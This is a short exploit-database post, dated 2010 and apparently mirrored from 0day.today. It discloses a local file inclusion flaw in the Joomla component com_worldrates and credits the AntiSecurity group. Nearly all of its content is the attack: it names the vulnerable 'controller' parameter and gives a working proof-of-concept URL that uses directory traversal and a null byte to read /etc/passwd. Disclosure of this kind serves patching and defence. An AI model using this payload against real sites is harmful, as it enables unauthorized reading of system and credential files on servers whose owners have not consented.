id: 11754
date: 04/12/2010
title: Joomla com_worldrates Local File Inclusion Vulnerability
author: AntiSecurity
cves: 

========================================================
Joomla com_worldrates Local File Inclusion Vulnerability
========================================================

================================================================================================================
 
 
  [o] Joomla Component World Rates Local File Inclusion Vulnerability
  
       Software : com_worldrates
       Vendor   : http://dev.pucit.edu.pk/
       Download : http://dev.pucit.edu.pk/files/worldrates.zip
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/
 
 
================================================================================================================
 
 
  [o] Exploit
 
       http://localhost/[path]/index.php?option=com_worldrates&controller=[LFI]
 
 
  [o] PoC
 
       http://localhost/index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
 
 
================================================================================================================



#  0day.today [2023-03-22]  #